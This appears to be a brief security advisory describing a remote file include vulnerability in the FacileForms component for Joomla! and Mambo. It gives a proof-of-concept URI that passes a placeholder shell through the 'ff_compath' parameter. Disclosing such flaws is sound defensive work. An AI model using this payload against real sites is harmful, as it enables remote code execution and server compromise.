Joomla! and Mambo FacileForms Component 'ff_compath' Parameter Remote File Include Vulnerability

Joomla! and Mambo FacileForms Component 'ff_compath' Parameter Remote File Include Vulnerability

An attacker can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]